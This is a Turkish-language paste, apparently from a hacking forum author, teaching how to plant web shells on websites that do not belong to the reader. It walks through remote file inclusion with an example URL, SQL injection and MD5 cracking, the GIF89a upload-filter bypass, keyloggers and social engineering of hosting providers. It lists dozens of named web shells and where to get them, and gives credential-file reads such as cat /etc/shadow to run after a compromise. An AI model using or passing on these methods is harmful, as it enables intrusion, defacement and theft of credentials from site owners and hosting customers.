Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SHELL NEDİR ? => Shell Yüklendiği Sitede Size Çeşitli Yetkiler Veren Bir Materyaldir. Bu Yetkiler; Okuma, Yazma ve Silme Yetkileridir. shell Attığınız Sitede Bazen Bir Site Sahibinin Yetkilerini Kullanabilirken, Bazende Host Sahibinin Yetkilerini Kullana Biliyorsunuz. Bu Olaya Permission Yetkisi Diyebiliriz.Permissionları Açık Olan Bir Sunucuda İstediğiniz Bütün Dosya ve Klasöri Okuyabilir, Silebilir veya Yükleme Yapabilirsiniz. Permissionları Kapalı Bir Sunucuda İse Bu Yetkiler Sınırlıdır. Tam Yetkiye Ulaşabilmeniz İçin Serveri Rootlamanız Gerekmektedir.Bir shelli En İyi Shelikde Kullanabilmek İçin shell Komutlarını İyi Bilmek Gerekir. Bunun Sebebi İse Sınırlı Yetkiniz Olan Sunucularda Tam Yetkiye Sahip Olmanız İçindir.Bir Çok Sunucuda Manuel Geçişlere İzin Verilmektedir. Spoll/Mail Kısmından Sunududaki Diğer Sitelerin Kullanıcı Adını Öğrenerek Adres Çucuğundan Manuel Geçişlerde Yapabilirsiniz.Bazı Durumlarda İse shell Yüklediğimiz Sitede Ya Permissionlar Sınırlı Yetkilere Sahiptir, Yada Yine Sadece Yüklediğimiz Sitede Sınırsız Yetkiye Sahip Olabiliyoruz. Burada Sınırsız Yetkimiz Var İse ve Sadece İndex Atıp Çıkmak İstiyorsak İndex.html Dosyamızı Upload Eder Çıkarız. Eyerki Yetkilerimiz Sınırlandırılmış İse Sitedeki Config Dosyalarını Okuyarak SQL İle Bağlantı Sağlaya Biliriz.
- 2) SHELL NASIL ATILIR ?
- Aşamaları:
- * Remote File Iclusion Açıklarından Faydalanabiliriz
- * SQL Injection Açıklarından Faydalanabiliriz
- * Exploits Kullanarak Yükleme Yapabiliriz
- * Upload Açıklarından Faydalanabiliriz
- * Logger vb Spy Yazılımlardan Faydalanabiliriz
- * Hedef Sunucudan Hesap Açarak Yükleme Yapabiliriz
- * Sosyal Mühendislik Kullanarak Yükleme Yapabiliriz
- - Dosya Yöneticisinden dosya yükleyerek
- 1) Remote File Inclusion Açıklarını Kullanarak .Txt Uzantılı shellimizden Yukarıda Bahsetiğim Yetkiler Çerçevesinde (Permissionlar) İstediğimiz Gibi .Php Uzantılı shell Yükleyebiliriz. veya Bağlandığımız .Txt shell ile Yine Sunucu Yetkileri Çerçevesinde Alt Dizinlere Geçebiliriz yada İndeximizi Upload Eder Çıkarız.
- Örnek =>
- siteadi.com/İndex.php?denetim=Http://siteadi.com/c99.txt?
- İle Bağlandığımız Siteye .php Uzantılı shelli Upload Edersek Kullanımı Şu Şekilde Olur.
- siteadi.com/c99.php
- Şeklinde Kullanıma Geçebiliriz.
- RFI Konusunu Artık Bilmeyen Yok Şuanda RFI Bitmesede Çok Nadir Rastlanan Açıklar Haline Deldi. Bu Yüzden Bütün Hakcing Bilgilerinizi RFI Açığına Bağlamayın.
- 2) SQL Injection Açığıyla Nasıl shell Atacaz. Öncelikle SQL Açığını Kullanmasını Bilen Mantığı Hemen Anlar, nedir Bu Mantık? SQL Kodları Yardımıyla Site Sahibinin Kullanıcı Adı ve Şifresini Elde Ediyoruz. Kimi Zaman MD5 Seklinde Şifre Gelir, Bizde MD5 Cracker Yardımıyla Kırarız. Havij bu yönden en iyi araçtır. Ama manuel her zaman daha iyi sonuç verir.
- Elde Ettiğimiz Kullanıcı Adı ve Şifre İle Siteye Giriş Yaparız Admin Panelden Bir Upload Yeri Bulur shell Dosyamızı (.php veya .asp) Upload Ederiz ve Yine Sunucuya Bağlanmış Oluruz.
- SQL Şuanda Kullanılan Yaygın Hacking Yöntemlerinden Biridir. Çok Büyük Sitelerde Bile Rastlanan Hiç Değilse Her Serverde En Az 1 den Fazla Sitede Rastlanan Açıktır.
- 3) Exploits Kullanarak shell Atabiliriz Buda Yine Derlenmiş Exploitler Sayesinde Sitenin Admin Bilgilerini (kullanıcı adı ve şifresini) Elde Ederek Admin Panelden shell Upload Edebiliriz ve Yine Sunucuda Yetkilerimiz Dahilinde İşlem Yapabiliriz.
- Buna Şöyle Bir Örnek Vereyim, Bir Dönem IPB Forumlarında Exploits Sayesinde Admin Şifrelerine Ulaşabiliyorduk. Hala Çoğu IPB Forumlarında shellerim Bulunmakta.
- 4) Upload Açıklarından Faydalanarak Sitelere shell Yükleyebiliriz. Burada Genellikle .php veya .asp Uzantılı shellerimizi Kabul Etmeyen Upload Siteleriyle Karşılaşıyoruz. Bunun İçin shell İçine GIF89;a Yazısını Ekleyerek Upload Sayfasının Yükleyeceğimiz shelli Resim Dosyası Olarak Görmesini Sağlarız.
- Aklınızın Almayacağı Kadar Çok Upload Dosyaları Vardır. Bunlardan En Çok Kullanılan Bir İki Tanesini Yazayım.
- upload.php , upload.asp , upload.htm , upload.html
- Bu Uzantıları ve Upload Sayfalarını Hayal Gücünüze Bağlı Çoğalta Bilirsiniz.
- 5) Hiç Tavsiye Etmediğim ve Hiç Kullanmadığım Ancak Buda Bir Hacking Yöntemi Olduğu İçin Açıklamak Zorunda Kaldığım Bir Yöntem. Logger vb Spy Yazılımlar Sayesinde shell Nasıl Atılır? Öncelikle Hedef Sitemizin Adminini Buluyoruz Gerekli SM vb İşlemleri Gerçekleştirdikten Sonra Loggeri Yedirip Admin Şifreleride Dahil Olmak Üzere FTP ve Mail Şifrelerini Alırız. Aldığımız Şifreler Sayesinde Site Sahibinin Yetkilerini Almamıza Rağmen FTP Sine Girdiğimiz Sitenin Sunusunada Ulaşmak İstiyorsan shell Upload Eder ve Yetkilerimiz Çerçevesinde İzinlerimizi Kullanarak Siteyi veya Serveri Hackleye Biliriz.
- 6) Bu Maddemizde İse Diyelimki Hedef bir Site var. Sitede Her Şeyi Yapmamıza Rağmen Bir Türlü Açık Bulamadık. Genelde Son Çare Olarak Kullanılan Bu Yöntemle Hostcuyla İrtibata Geçer SM Yaparak Sunucudan Bir Hesap Açarız Açtığımız Hesapta Göz Boyamak Adına Ufak Tefek Portallar Kurar ve FTP mize shell Atarak Serveri Rootlar Hedef Siteye Ulaşırız veya Manuel Geçiler Yaparakda Hedef Siteye Ulaşabiliriz.
- 7) Sosyal Mühendislik Yöntemiyle Siteye shell Yükleye Biliriz. Burada İşin İçine SM Girdiği İçin Belirli Bir Yöntem Yoktur. Ancak SM Yapan Kişinin Kabiliyetine Bağlıdır. Bir Kişi Sosyal Mühendislik Yapabilecek Kabiliyetteyse Çok Kolay ve Rahat Bir Şekilde Çeşitli Yollarla Siteye veya FTP ye Ulaşarak shell Atabilir.
- shell Nasıl Atılır Maddemizde Burada Bitmiştir. Yukarıda Belirttiğim 7 Madde Çoğaltılabilir. Bu Konuda da Anlamadığınız veya Daha Detaylı Anlatmamı İstediğiniz Yerleri Konu Altına Belirtirseniz Farklı veya Daha Geniş Anlatımlar Yapabilirim.
- Ençok Kullanılan sheller:
- C99.php (Yeni Başlayanlar İçin Kullanımı Kolay Bir shell)
- R57.php ( shell Olayını Artık Çözmüş Kod Bilgisine Döken Kişiler Kullanıyor)
- Benim kullandığım sheller ise Sadrazam Angel Shell - Kendime ait hacker_20 Shel - Gaza Shell - c100 - Locus Shell
- Bunların haricinde şu sheller'de vardır.
- 99Shell v. 1.0 beta (5.02.2005) PHP
- b374k PHP
- b374k-mini-shell PHP
- Cyber Shell PHP
- GFS Web-Shell PHP
- NFM 1.8 PHP
- r57shell PHP
- Small Web Shell by ZaCo PHP
- nsTView v2.1 PHP
- DxShell v1.0 PHP
- C99madShell v. 2.0 madnet edition PHP
- CTT Shell PHP
- GRP WebShell 2.0 release build 2018 ©2006,Great PHP
- Crystal shell PHP
- Loaderz WEB Shell PHP
- NIX REMOTE WEB SHELL PHP
- Antichat Shell PHP
- CasuS 1.5 PHP
- Sincap 1.0 PHP
- C99Shell v. 1.0 pre-release build(safe-mode) PHP
- hiddens shell v1 PHP
- Web-shell ©ShAnKaR PHP
- Predator PHP
- KA_uShell 0.1.6 PHP
- NGH PHP
- C2007Shell v. 1.0 pre-release build #16 Modded by Adora & u9 h4c93r PHP
- Antichat Shell. Modified by Go0o$E PHP
- c0derz shell [csh] v. 0.1.1 release PHP
- iMHaBiRLiGi Php FTP PHP
- PHVayv PHP
- phpRemoteView PHP
- STNC WebShell v0.8 PHP
- MyShell PHP
- ZyklonShell PHP
- AK-74 Security Team Web Shell Beta Version PHP
- Gamma Web Shell Perl-Cgi
- go-shell Perl-Cgi
- PhpSpy Ver 2006 Perl-Cgi
- CmdAsp.asp.txt ASP
- CyberSpy5.Asp.txt ASP
- klasvayv.asp.txt ASP
- indexer.asp.txt ASP
- NTDaddy v1.9 ASP
- reader.asp.txt ASP
- RemExp.asp.txt ASP
- zehir4.asp.txt ASP
- Elmaliseker.txt ASP
- EFSO_2.txt ASP
- accept_language PHP
- Ajax_PHP Command Shell PHP
- Antichat Shell v1.3 PHP
- Ayyildiz Tim -AYT- Shell v 2.1 Biz PHP
- aZRaiLPhp v1.0 PHP
- backupsql PHP
- c99 PHP
- c99_locus7s PHP
- c99_madnet PHP
- c99_PSych0 PHP
- c99_w4cking PHP
- Crystal PHP
- ctt_sh PHP
- cybershell PHP
- dC3 Security Crew Shell PRiV PHP
- Dive Shell 1.0 - Emperor Hacking Team PHP
- DTool Pro PHP
- Dx PHP
- GFS web-shell ver 3.1.7 - PRiV8 PHP
- gfs_sh PHP
- h4ntu shell [powered by tsoi] PHP
- iMHaPFtp PHP
- ironshell PHP
- JspWebshell 1.2 PHP
- KAdot Universal Shell v0.1.6 PHP
- lamashell PHP
- Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit PHP
- load_shell PHP
- matamu PHP
- Moroccan Spamers Ma-EditioN By GhOsT PHP
- myshell PHP
- Mysql interface v1.0 PHP
- MySQL Web Interface Version 0.8 PHP
- mysql PHP
- mysql_tool PHP
- NCC-Shell PHP
- NetworkFileManagerPHP PHP
- NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version PHP
- nshell PHP
- nstview PHP
- PH Vayv PHP
- PHANTASMA PHP
- PHP Shell PHP
- php-backdoor PHP
- php-include-w-shell PHP
- pHpINJ PHP
- PHPJackal PHP
- PHPRemoteView PHP
- Private-i3lue PHP
- pws PHP
- r57 PHP
- r57_iFX PHP
- r57_kartal PHP
- r57_Mohajer22 PHP
- rootshell PHP
- ru24_post_sh PHP
- s72 Shell v1.1 Coding PHP
- Safe0ver Shell -Safe Mod Bypass By Evilc0der PHP
- Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 PHP
- SimAttacker - Vrsion 1.0.0 - priv8 4 My friend PHP
- simple_cmd PHP
- simple-backdoor PHP
- SimShell 1.0 - Simorgh Security MGZ PHP
- SnIpEr_SA Shell PHP
- Uploader PHP
- WinX Shell PHP
- Worse Linux Shell PHP
- zacosmall PHP
- Antichat Shell v1.3 PHP
- Ayyildiz Tim -AYT- Shell v 2.1 Biz PHP
- aZRaiLPhp v1.0 PHP
- CrystalShell v.1 PHP
- Cyber Shell (v 1.0) PHP
- dC3 Security Crew Shell PRiV PHP
- Dive Shell 1.0 - Emperor Hacking Team PHP
- DxShell.1.0 PHP
- ELMALISEKER Backd00r ASP
- GFS web-shell ver 3.1.7 - PRiV8 PHP
- h4ntu shell [powered by tsoi] PHP
- JspWebshell 1.2 JSP
- KAdot Universal Shell v0.1.6 PHP
- Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit PHP
- Macker's Private PHPShell PHP
- Mysql interface v1.0 PHP
- MySQL Web Interface Version 0.8 PHP
- NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version PHP
- Perl Web Shell by RST-GHC PL
- Private-i3lue PHP
- RedhatC99 [login=redhat-pass=root] PHP
- Rootshell.v.1.0 PHP
- s72 Shell v1.1 Coding PHP
- Safe0ver Shell -Safe Mod Bypass By Evilc0der PHP
- Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 PHP
- SimAttacker - Vrsion 1.0.0 - priv8 4 My friend PHP
- SimShell 1.0 - Simorgh Security MGZs PHP
- WinX Shell PHP
- Worse Linux Shell PHP
- MassDefacer PHP
- Joomla Index PHP
- Madspot Shell PHP
- Bu shelleri bulabilmek için google amcamızdan C99-R57 shell gibi yazılar yazdığımız zaman siteler çıkıyor ama dikkatli olun içinde çok log tutanlar var.
- r57.gen.tr/
- r57shell.net/
- gibi sitelerden yararlanabilirsiniz fakat çoğu log tuttukları için dikkatli olmak gerekir.
- Siz benim logsuz shellerimden kullanabilirsiniz
- cyberizm.org/cyberizm-logsuz-shell-arsivi-cyberizm.html
- cyberizm.org/cyberizm-128-adet-farkli-shell-paketi-cyberizm.html
- Genelde c99 ve r57'de kullanılan Shell Komutları =>
- Not => Ben bunları kullanmıyorum ama yerine göre, en güzeli şuan sadrazam shell'dir.
- cat /etc/shadow – Bu komut sunucu üzerinde bulunan Sitelere ait şifreleri saklı halini gösterir (%90 perm var demektir)
- cat /etc/passwd – Komutunu çalıştırdığınız halde Server Root üzerinde bulunmakta olan tüm kullanıcı listesini sunar.
- var /named – İlgili komut sadece Makina içerisinde bulunan tüm sitelerin adını gösterir.
- /var/cpanel – Sunucu içerisinde bulunan cpanel loglarını hazırlayıp bir liste halinde gösterir.
- /var/mail – Makina içindeki tüm E-mailleri sizlere verir örnek: (info@c99shell.info)
- /tmp – Bu komut ise Linux Shell’de yazma izini ile en çok bulunan klasörlere erişim yapmanızı sağlar.
- /etc/vdomainaliases – Sunucu tabanı altında bulunan hem kullanıcı adlarını ve Site adreslerini listeler.
- Not 2 => Komut bilgisine sahip değilseniz maalesef shelli çalıştırmanız ve Uzmanlaşmanız söz konusu olmayacaktır.
- Eğer windows değilde Linux kullanıyorsan Shell Komutları farklı olacaktır.
- alias Bir komuta icin kisayollar yaratmak icin
- at Belirlenen bir zamanda programi calistirmak icin
- atq Liste halinde at icin bekleyen programlari verir
- atrm at listesinden bir programi silmek icin
- cat Programin icerigini standart cikti cihazinda gosterir
- chfn Finger ile saglanan bilgileri degistirmek icin
- chsh Kullandiginiz kabuk programini degistirmek icin
- cp Dosyalari kopyalamak icin
- dd Disk iceriklerini kopyalamak icin
- df Kullanilabilir disk alani
- dir Klasorun icerigini goruntulemek icin
- dmesg Acilis mesajini goruntulemek icin
- dump Sistemleri yedeklemek icin
- e2fsck Dosya sistemlerini hataya karsi kontrol etmek icin
- export Kabuk icinde cevre degiskeni yaratmak icin
- find Dosyalari bulmak icin
- fdformat Dusuk seviye disk formatlama
- fdisk Yeni disk bolumleri yaratmak veya silmek icin
- finger : Sunucudan kullanici bilgisini almak icin
- free : Hafiza (RAM) Takas Alani(Swap) bilgisi icin
- grep : Verilen karekter grubuna uyan satirlari bulmak icin
- groupadd veya addgroup* : Yeni bir kullanici grubu yaratmak icin
- groupdel veya delgroup* : Kullanici grubu silmek icin
- groups : Sistemdeki kullanici gruplarini listelemek icin
- gzip : Dosyalara sikistirma yapmak veya acmak icin
- halt : Sistemi kapatmak icin
- host : Sunucu bilgisine bakmak icin
- ifconfig : Ağ(Network) arayuzlerini tanimlamak icin
- init : Calisma Seviyesini (Run Level) tayin icin ; konsol seviyuesi "init 3" , xwindow masaüstü grafik seviyesi " init 5 " , shotdown kapatma seviyesi " init 6 "
- insmod : Modulleri yukleyebilmek icin
- kill : Calisan surecleri durdurmak icin (process)
- less : Dosyalari goruntulerken filtre koymak icin
- ln : Dosya veya klasorler arasinda link yaratmak icin
- locate : Verilen karektere uyan dosyalari belirlemek icin
- login : Sisteme baglanmak veya kullanici degistirmek icin
- logout : (ctrl+d) Sistemden ayrilmak icin
- lpc : Yazici kuyrugunu duzenlemek icin
- lpq : Yazici kuyrugunu goruntulemek icin
- lpr : Dosylari yazdirmak icin
- ls : Klasor icerigini listelemek icin
- lsmod : Yuklu modulleri gormek icin
- make : Dosyalari derlemek veya bakim yapmak icin
- makewhatis : "whatis" veritabani yaratmak icin
- man : Manual sayfalarini goruntulemek icin
- mcd : DOS disketindeki bir klasore gecmek icin
- mcopy : DOS disketine dosya kopyalamak icin
- mdel : DOS disketinden dosya silmek icin
- mdeltree : DOS disketinden klasor silmek icin
- mdir : DOS disketindeki bir klasorun icerigini goruntule
- mformat : DOS disketini formatlar (bicimlendirir)
- mkbootdisk : Acilis diketi yaratmak icin (boot disk)
- mkdir : Yeni bir klasor yaratmak icin
- mkswap : Takas alani yaratmak icin (Swap Space)
- modprobe : Modulleri (sistem suruculeri) yuklemek icin
- more : Klasor ve dosyalari goruntulerken filtre koymak icin
- mount : Dosya sistemleri ve Cihazlari sisteme tanitmak icin
- mv : Dosyalari tasimak veya isimlerini degistirmek icin
- netcfg : (her dagitimda bulunmaz) Ag Yapilandirma Araci
- netstat : Ağ baglantilarinin durumunu gosterir
- nslookup : Isim Sunucusunu (Name Server) kullanmak icin
- passwd : Kullanici sifresini degisitirmek icin
- ping : Ağ uzerinde bir sunucunun varligini kontrol icin
- printtool : Yazici kurmak icin
- ps : Sureclerin ozelliklerini gostermek icin
- pstree : Surec yer aldigi mantiksal agaci gostermek icin
- pwd : O an icinde bulunulan klasoru gostermek icin
- reboot : Sistemi tekrar baslatmak icin (shutdown -r now)
- restore : Dump yedek dosyalarini ilk haline getirmek icin
- rm : Dosyalari silmek icin
- rmdir : Klasorleri silmek icin
- rmmod : Yuklu modulleri kaldirmak icin
- rpm : RPM paketlerini yonetmek icin örn: rpm -i deneme.rpm
- set : Kabuk cevre degiskenlerini degistirmek icin
- shutdown : Sistemi kapatmak icin cheesygrin
- startx : X Windows alt sistemini baslatmak icin
- su : Bir baska kullaniciya gecmek icin(switch user)
- sync : Tampon veriyi hard diske yazmak icin
- sysinfo : Sistem ile ilgili bilgi almak icin
- tar : Sikistirilmis arsivler yaratmak icin veya açmak için örn :tar xvf deneme.tgz
- top : Calisan surecleri goruntulemek icin
- touch : Boş bir dosya yaratmak veya olan dosyanin zaman bilgilerini degistirmek icin(yaratilma,erisilme gibi)
- traceroute : IP paketlerinin izledigi yolu goruntulemek icin
- umount : Sistemde yuklu bulunan dosya yapilarini sistemden ayirmak icin
- uname : Sistem hakkinda bilgi almak icin örn : uname -r
- unzip : Sikistirilmis dosyalari eski haline getirmek icin örn unzip deneme.zip
- updatedb : "locate" veritabanini yaratmak,guncellemek icin
- uptime : Sistemin ne kadar uzun zamandir acik kaldigi,
- useradd veya adduser* : Yeni kullanici hesaplari eklemek icin
- userdel veya deluser* : Kullanici hesaplarini silmek icin
- usermod : Kullanici hesaplarini duzenlemek icin
- whatis : Komut hakkinda basit icerik saglamak icin
- whereis : Komut icin uygulama,kaynak ve manual dosyalarini belirlemek icin,
- which : Program icin uygulama dosyasinin dosya sistemindeki yerini belirlemek icin,
- who : Kimin o anda sisteme bagli oldugunu gormek icin
- whoami : Sisteme bagli bulunan kullanicinin kim oldugunu goruntulemek icin
- xlock : X Windows alt sistemini kilitlemek icin
- Bence bu kadar anlatım yeter. KingSkrupellos Cyberizm.Org - Emeğe Saygı
- Anlaşılmayan bir konu varsa anlatabilirim
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement